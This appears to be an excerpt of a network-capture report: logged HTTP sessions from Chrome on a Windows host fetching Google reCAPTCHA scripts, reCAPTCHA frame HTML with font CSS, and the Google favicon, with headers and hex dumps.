                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: same-origin
                                                                                                                                                    Sec-Fetch-Dest: worker
                                                                                                                                                    Referer: https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b&co=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbTo0NDM.&hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&size=normal&s=xz3LsDhnVKWNDPAxYsfSai-65gQfUWB55L8TFubhcQqJlrltbCH3uiMgqw9QAslta7P_yQ2bZH1ORXgoYVB-hTK_zEC7bXvNca4AZA-u_gcND1aHqzQAuQdE8YR_32tCw2qLxz-xd4-Z3Nm9D50Nbwkns7louT2dRkQLmWk-2Dn-QozQIbnlAs_c6yUIm5PKVMMSXO7KlIPqv21jVxvuhA6gVzHJJcirmiwhSjBz4o70vFTT38JJB0MyLvqVTg1YM6Qx6WiknHHxvIM6RlgthjUDYRm3_PM&cb=px5dhzo8o1yu
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
                                                                                                                                                    2024-02-21 07:14:10 UTC655INHTTP/1.1 200 OK
                                                                                                                                                    Content-Type: text/javascript; charset=utf-8
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                    Expires: Wed, 21 Feb 2024 07:14:10 GMT
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:10 GMT
                                                                                                                                                    Cache-Control: private, max-age=300
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Server: GSE
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Connection: close
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    2024-02-21 07:14:10 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                                                    Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/recaptcha__en.js');
                                                                                                                                                    2024-02-21 07:14:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    11192.168.2.549729142.250.65.2284437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:11 UTC1367OUTGET /recaptcha/api2/bframe?hl=en&v=yiNW3R9jkyLVP5-EEZLDzUtA&k=6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                                    Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
                                                                                                                                                    2024-02-21 07:14:11 UTC891INHTTP/1.1 200 OK
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                    Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                    Date: Wed, 21 Feb 2024 07:14:11 GMT
                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--cPuZws0AyfJ2EwKWZy24Q' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Server: GSE
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Connection: close
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    2024-02-21 07:14:11 UTC361INData Raw: 31 64 30 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20
                                                                                                                                                    Data Ascii: 1d0d<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cyrillic-ext */@font-face
                                                                                                                                                    2024-02-21 07:14:11 UTC1252INData Raw: 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34 30 2d 41 36 39 46 2c 20 55 2b 46 45 32 45 2d 46 45 32 46 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f
                                                                                                                                                    Data Ascii: to/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;}/* cyrillic */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//
                                                                                                                                                    2024-02-21 07:14:11 UTC1252INData Raw: 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c
                                                                                                                                                    Data Ascii: F9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329,
                                                                                                                                                    2024-02-21 07:14:11 UTC1252INData Raw: 39 30 2d 30 34 39 31 2c 20 55 2b 30 34 42 30 2d 30 34 42 31 2c 20 55 2b 32 31 31 36 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d
                                                                                                                                                    Data Ascii: 90-0491, U+04B0-04B1, U+2116;}/* greek-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}
                                                                                                                                                    2024-02-21 07:14:11 UTC1252INData Raw: 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 42 42 63 34 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 30 30 30 2d 30 30 46 46 2c 20 55 2b 30 31 33 31 2c 20 55 2b 30 31 35 32 2d 30 31 35 33 2c 20 55 2b 30 32 42 42 2d 30 32 42 43 2c 20 55 2b 30 32 43 36 2c 20 55 2b 30 32 44 41
                                                                                                                                                    Data Ascii: */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2) format('woff2'); unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA
                                                                                                                                                    2024-02-21 07:14:11 UTC1252INData Raw: 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74 66 42 78 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 37 30 2d 30 33 37 37 2c 20 55 2b 30 33 37 41 2d 30 33 37 46 2c 20 55 2b 30 33 38 34 2d 30 33 38 41 2c 20 55 2b 30 33 38 43 2c 20 55 2b 30 33 38 45 2d 30 33 41 31 2c 20 55 2b 30 33 41 33 2d 30 33 46 46 3b 0a 7d 0a 2f 2a 20 76 69 65 74 6e 61 6d 65 73 65 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c
                                                                                                                                                    Data Ascii: rl(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUtfBxc4EsA.woff2) format('woff2'); unicode-range: U+0370-0377, U+037A-037F, U+0384-038A, U+038C, U+038E-03A1, U+03A3-03FF;}/* vietnamese */@font-face { font-family: 'Roboto'; font-style: normal
                                                                                                                                                    2024-02-21 07:14:11 UTC824INData Raw: 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 79 69 4e 57 33 52 39 6a 6b 79 4c 56 50 35 2d 45 45 5a 4c 44 7a 55 74 41 2f 73 74 79 6c 65 73 5f 5f 6c 74 72 2e 63 73 73 22 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 2d 63 50 75 5a 77 73 30 41 79 66 4a 32 45 77 4b 57 5a 79 32 34 51 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 77 69 6e 64 6f 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 20 3d 20 27 68 74 74
                                                                                                                                                    Data Ascii: , U+FEFF, U+FFFD;}</style><link rel="stylesheet" type="text/css" href="https://www.gstatic.com/recaptcha/releases/yiNW3R9jkyLVP5-EEZLDzUtA/styles__ltr.css"><script nonce="-cPuZws0AyfJ2EwKWZy24Q" type="text/javascript">window['__recaptcha_api'] = 'htt
                                                                                                                                                    2024-02-21 07:14:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    12192.168.2.549730142.250.65.2284437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:11 UTC1178OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS_YOPeGL7F1q4GIjBwAWbomQLbaJKyWdrTAZ9MKsU5Vq2-V7iqyHfa4-ZPY5fgDT5PQDrRGB3-eVas0UEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: NID=511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4; 1P_JAR=2024-02-21-07; AEC=Ae3NU9MBixZLIde_1N07qJj3s37lv5ooCeQDtC9mj3Hmwo7WGjwK0pzd8w
                                                                                                                                                    2024-02-21 07:14:12 UTC706INHTTP/1.1 200 OK
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                                                                                    Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                                                                                    Content-Length: 5430
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    Server: sffe
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Date: Wed, 21 Feb 2024 02:44:51 GMT
                                                                                                                                                    Expires: Thu, 29 Feb 2024 02:44:51 GMT
                                                                                                                                                    Cache-Control: public, max-age=691200
                                                                                                                                                    Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                                                                                    Content-Type: image/x-icon
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Age: 16161
                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                    Connection: close
                                                                                                                                                    2024-02-21 07:14:12 UTC546INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                                                                                    Data Ascii: h& ( 0.v]X:X:rY
                                                                                                                                                    2024-02-21 07:14:12 UTC1252INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 a6 75 ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff 0b be fb ff 05 bc fb ff b6 ec fe ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f7 aa 7b ff ff ff ff ff fd fd fd f9 fd fd fd db ff ff ff ff 35 c9 fc ff 0a b2 f9 ff 6b a4 f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea
                                                                                                                                                    Data Ascii: BBBBBuBBBBB{5k7R8F2Vb5C
                                                                                                                                                    2024-02-21 07:14:12 UTC1252INData Raw: de ee d8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 fe fe fe 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 24 fd fd fd ea ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff eb f5 e7 ff 8f c6 7b ff 54 a9 36 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 7e be 67 ff dd ee d7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd e8 ff ff ff 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd d3 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c4 e1 b9 ff 5c ac 3e ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34
                                                                                                                                                    Data Ascii: /${T6S4S4S4S4S4S4S4S4S4~g"\>S4S4S4S4S4S4S4S4S4S4
                                                                                                                                                    2024-02-21 07:14:12 UTC1252INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fa c8 aa ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd f9 fd fd fd fa ff ff ff ff ff ff ff ff ff ff ff ff 07 bd fb ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 7d dc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                    Data Ascii: BBBBBBBBBBB}BBBBBBBBBBB}
                                                                                                                                                    2024-02-21 07:14:12 UTC1128INData Raw: ff ff ff ff a0 a7 f5 ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 81 8a f2 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 0b fd fd fd d5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b5 ba f7 ff 3e 4b eb ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 3f 4c eb ff ba bf f8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 26 fd fd fd eb ff ff ff
                                                                                                                                                    Data Ascii: 5C5C5C5C5C5C5C5C5C5C5C5C5C5C5C>K5C5C5C5C5C5C5C5C5C5C5C5C?L&


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    13192.168.2.549731142.251.40.1004437220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-02-21 07:14:12 UTC721OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
